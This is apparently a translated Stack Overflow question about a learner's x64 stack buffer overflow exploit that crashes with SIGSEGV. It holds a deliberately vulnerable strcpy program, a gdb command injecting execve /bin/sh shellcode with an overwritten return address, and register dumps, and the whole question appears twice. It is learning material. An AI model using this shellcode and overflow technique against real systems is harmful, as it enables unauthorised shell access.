在 x64 架构上执行 push 指令时出现 “Cannot access memory” 错误
Getting Cannot access memory on executing push instruction on x64 architecture
我正在尝试学习缓冲区溢出漏洞利用。shell 代码中的指令单独执行时运行没有任何问题,但当控制权通过我试图利用的程序转交给它时,它却在一条 push 指令处停止,并报出 SIGSEGV 错误。
我在覆盖返回地址方面遇到了困难。ASLR 已禁用,且栈是可执行的。
这是我的程序:
#include<stdio.h>
#include<string.h>
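/*
 * Prints a fixed greeting to stdout.
 *
 * Called once from main() before the buffer and function addresses are
 * reported.  Takes no arguments and returns nothing; the prototype is
 * spelled (void) so the compiler rejects stray arguments instead of
 * accepting an unspecified parameter list.
 */
void cllme(void)
{
    printf("hello world\n");
}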
/*
 * Entry point of the deliberately vulnerable test program.
 *
 * argc/argv: standard command-line arguments; argv[1] is copied into a
 * fixed-size stack buffer.
 * Returns 0 unconditionally.
 *
 * Defects, left in place because the gdb session below depends on them:
 *  - argv[1] is read without checking argc, so running the binary with no
 *    argument passes NULL to strcpy (undefined behaviour).
 *  - strcpy does not bound the copy, so any argument longer than 29 bytes
 *    writes past 'buffer' into the rest of the frame, including the saved
 *    return address.  A bounded copy such as
 *    snprintf(buffer, sizeof buffer, "%s", argv[1]) would remove the
 *    overflow (strncpy would not: it may leave the buffer unterminated).
 */
int main(int argc, char *argv[]){
/* 30 bytes of stack; the exact frame layout is what the transcript relies on. */
char buffer[30];
cllme();
/* Reporting the buffer address is what makes the stack location known with
   ASLR disabled.  %p formally expects a void *, so (void *)buffer is the
   strictly conforming spelling. */
printf("buffer is at %p\n",buffer);
/* Passing a function pointer to %p is not a valid conversion in ISO C; it
   happens to work on common x86-64 ABIs but should be cast for portability. */
printf("callme is at %p\n",cllme);
/* Unbounded copy of an attacker-controlled argument: this is the overflow. */
strcpy(buffer,argv[1]);
return 0;
}
这是我在 gdb 中执行的命令:
run $(python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+13*"a"+"\x10\xe4\xff\xff\xff\x7f"')
(gdb) x/13i $rip
=> 0x7fffffffe41c: neg rbx
0x7fffffffe41f: push rbx
0x7fffffffe420: push rsp
0x7fffffffe421: pop rdi
0x7fffffffe422: cdq
0x7fffffffe423: push rdx
0x7fffffffe424: push rdi
0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x3b
0x7fffffffe429: syscall
0x7fffffffe42b: (bad)
0x7fffffffe42c: (bad)
(gdb) i r
rax 0x0 0
rbx 0xff978cd091969dd1 -29400045130965551
rcx 0xe410616161616161 -2013001962561117855
rdx 0x7fffffffe41061 36028797017133153
rsi 0x7fffffffe7c0 140737488349120
rdi 0x7fffffffe432 140737488348210
rbp 0x6161616161616161 0x6161616161616161
rsp 0x7fffffffe440 0x7fffffffe440
r8 0x1 1
r9 0x1c 28
r10 0x78 120
r11 0x7ffff7b95f48 140737349508936
r12 0x5555555545f0 93824992232944
r13 0x7fffffffe510 140737488348432
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe41c 0x7fffffffe41c
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) nexti
0x00007fffffffe41f in ?? ()
(gdb) i r
rax 0x0 0
rbx 0x68732f6e69622f 29400045130965551
rcx 0xe410616161616161 -2013001962561117855
rdx 0x7fffffffe41061 36028797017133153
rsi 0x7fffffffe7c0 140737488349120
rdi 0x7fffffffe432 140737488348210
rbp 0x6161616161616161 0x6161616161616161
rsp 0x7fffffffe440 0x7fffffffe440
r8 0x1 1
r9 0x1c 28
r10 0x78 120
r11 0x7ffff7b95f48 140737349508936
r12 0x5555555545f0 93824992232944
r13 0x7fffffffe510 140737488348432
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe41f 0x7fffffffe41f
eflags 0x213 [ CF AF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/13i $rip
=> 0x7fffffffe41f: push rbx
0x7fffffffe420: push rsp
0x7fffffffe421: pop rdi
0x7fffffffe422: cdq
0x7fffffffe423: push rdx
0x7fffffffe424: push rdi
0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x3b
0x7fffffffe429: syscall
0x7fffffffe42b: (bad)
0x7fffffffe42c: (bad)
0x7fffffffe42d: (bad)
(gdb) i r
rax 0x0 0
rbx 0x68732f6e69622f 29400045130965551
rcx 0xe410616161616161 -2013001962561117855
rdx 0x7fffffffe41061 36028797017133153
rsi 0x7fffffffe7c0 140737488349120
rdi 0x7fffffffe432 140737488348210
rbp 0x6161616161616161 0x6161616161616161
rsp 0x7fffffffe440 0x7fffffffe440
r8 0x1 1
r9 0x1c 28
r10 0x78 120
r11 0x7ffff7b95f48 140737349508936
r12 0x5555555545f0 93824992232944
r13 0x7fffffffe510 140737488348432
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe41f 0x7fffffffe41f
eflags 0x213 [ CF AF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) nexti
Warning:
Cannot insert breakpoint 0.
Cannot access memory at address 0x68732f6e69622f
(gdb)nexti
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe426 in ?? ()
谢谢 Jester 指出问题。事实证明,栈指针指向地址 e440,而 shell 代码本身就位于栈上、紧挨在它下方;一旦压入超过 20 个字节,push 写入的数据就会覆盖尚未执行的 shell 代码字节,生成一条试图访问 rbx 所指地址的指令,从而导致崩溃。
(gdb) stepi
0x00007fffffffe424 in ?? ()
(gdb) x/11i $rip
=> 0x7fffffffe424: push rdi
0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x3b
0x7fffffffe429: syscall
0x7fffffffe42b: (bad)
0x7fffffffe42c: (bad)
0x7fffffffe42d: (bad)
0x7fffffffe42e: (bad)
0x7fffffffe42f: (bad)
0x7fffffffe430: add BYTE PTR [rax],al
(gdb) stepi
0x00007fffffffe425 in ?? ()
(gdb) x/11i $rip
=> 0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x38
0x7fffffffe429: in al,0xff
我正在尝试学习缓冲区溢出漏洞利用。shell 代码中的指令单独执行时运行没有任何问题,但当控制权通过我试图利用的程序转交给它时,它却在一条 push 指令处停止,并报出 SIGSEGV 错误。我在覆盖返回地址方面遇到了困难。ASLR 已禁用,且栈是可执行的。这是我的程序:
#include<stdio.h>
#include<string.h>
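/*
 * Prints a fixed greeting to stdout.
 *
 * Called once from main() before the buffer and function addresses are
 * reported.  Takes no arguments and returns nothing; the prototype is
 * spelled (void) so the compiler rejects stray arguments instead of
 * accepting an unspecified parameter list.
 */
void cllme(void)
{
    printf("hello world\n");
}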
/*
 * Entry point of the deliberately vulnerable test program.
 *
 * argc/argv: standard command-line arguments; argv[1] is copied into a
 * fixed-size stack buffer.
 * Returns 0 unconditionally.
 *
 * Defects, left in place because the gdb session below depends on them:
 *  - argv[1] is read without checking argc, so running the binary with no
 *    argument passes NULL to strcpy (undefined behaviour).
 *  - strcpy does not bound the copy, so any argument longer than 29 bytes
 *    writes past 'buffer' into the rest of the frame, including the saved
 *    return address.  A bounded copy such as
 *    snprintf(buffer, sizeof buffer, "%s", argv[1]) would remove the
 *    overflow (strncpy would not: it may leave the buffer unterminated).
 */
int main(int argc, char *argv[]){
/* 30 bytes of stack; the exact frame layout is what the transcript relies on. */
char buffer[30];
cllme();
/* Reporting the buffer address is what makes the stack location known with
   ASLR disabled.  %p formally expects a void *, so (void *)buffer is the
   strictly conforming spelling. */
printf("buffer is at %p\n",buffer);
/* Passing a function pointer to %p is not a valid conversion in ISO C; it
   happens to work on common x86-64 ABIs but should be cast for portability. */
printf("callme is at %p\n",cllme);
/* Unbounded copy of an attacker-controlled argument: this is the overflow. */
strcpy(buffer,argv[1]);
return 0;
}
这是我在 gdb 中执行的命令:
run $(python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+13*"a"+"\x10\xe4\xff\xff\xff\x7f"')
(gdb) x/13i $rip
=> 0x7fffffffe41c: neg rbx
0x7fffffffe41f: push rbx
0x7fffffffe420: push rsp
0x7fffffffe421: pop rdi
0x7fffffffe422: cdq
0x7fffffffe423: push rdx
0x7fffffffe424: push rdi
0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x3b
0x7fffffffe429: syscall
0x7fffffffe42b: (bad)
0x7fffffffe42c: (bad)
(gdb) i r
rax 0x0 0
rbx 0xff978cd091969dd1 -29400045130965551
rcx 0xe410616161616161 -2013001962561117855
rdx 0x7fffffffe41061 36028797017133153
rsi 0x7fffffffe7c0 140737488349120
rdi 0x7fffffffe432 140737488348210
rbp 0x6161616161616161 0x6161616161616161
rsp 0x7fffffffe440 0x7fffffffe440
r8 0x1 1
r9 0x1c 28
r10 0x78 120
r11 0x7ffff7b95f48 140737349508936
r12 0x5555555545f0 93824992232944
r13 0x7fffffffe510 140737488348432
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe41c 0x7fffffffe41c
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) nexti
0x00007fffffffe41f in ?? ()
(gdb) i r
rax 0x0 0
rbx 0x68732f6e69622f 29400045130965551
rcx 0xe410616161616161 -2013001962561117855
rdx 0x7fffffffe41061 36028797017133153
rsi 0x7fffffffe7c0 140737488349120
rdi 0x7fffffffe432 140737488348210
rbp 0x6161616161616161 0x6161616161616161
rsp 0x7fffffffe440 0x7fffffffe440
r8 0x1 1
r9 0x1c 28
r10 0x78 120
r11 0x7ffff7b95f48 140737349508936
r12 0x5555555545f0 93824992232944
r13 0x7fffffffe510 140737488348432
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe41f 0x7fffffffe41f
eflags 0x213 [ CF AF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/13i $rip
=> 0x7fffffffe41f: push rbx
0x7fffffffe420: push rsp
0x7fffffffe421: pop rdi
0x7fffffffe422: cdq
0x7fffffffe423: push rdx
0x7fffffffe424: push rdi
0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x3b
0x7fffffffe429: syscall
0x7fffffffe42b: (bad)
0x7fffffffe42c: (bad)
0x7fffffffe42d: (bad)
(gdb) i r
rax 0x0 0
rbx 0x68732f6e69622f 29400045130965551
rcx 0xe410616161616161 -2013001962561117855
rdx 0x7fffffffe41061 36028797017133153
rsi 0x7fffffffe7c0 140737488349120
rdi 0x7fffffffe432 140737488348210
rbp 0x6161616161616161 0x6161616161616161
rsp 0x7fffffffe440 0x7fffffffe440
r8 0x1 1
r9 0x1c 28
r10 0x78 120
r11 0x7ffff7b95f48 140737349508936
r12 0x5555555545f0 93824992232944
r13 0x7fffffffe510 140737488348432
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe41f 0x7fffffffe41f
eflags 0x213 [ CF AF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) nexti
Warning:
Cannot insert breakpoint 0.
Cannot access memory at address 0x68732f6e69622f
(gdb)nexti
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe426 in ?? ()
谢谢 Jester 指出问题。事实证明,栈指针指向地址 e440,而 shell 代码本身就位于栈上、紧挨在它下方;一旦压入超过 20 个字节,push 写入的数据就会覆盖尚未执行的 shell 代码字节,生成一条试图访问 rbx 所指地址的指令,从而导致崩溃。
(gdb) stepi
0x00007fffffffe424 in ?? ()
(gdb) x/11i $rip
=> 0x7fffffffe424: push rdi
0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x3b
0x7fffffffe429: syscall
0x7fffffffe42b: (bad)
0x7fffffffe42c: (bad)
0x7fffffffe42d: (bad)
0x7fffffffe42e: (bad)
0x7fffffffe42f: (bad)
0x7fffffffe430: add BYTE PTR [rax],al
(gdb) stepi
0x00007fffffffe425 in ?? ()
(gdb) x/11i $rip
=> 0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x38
0x7fffffffe429: in al,0xff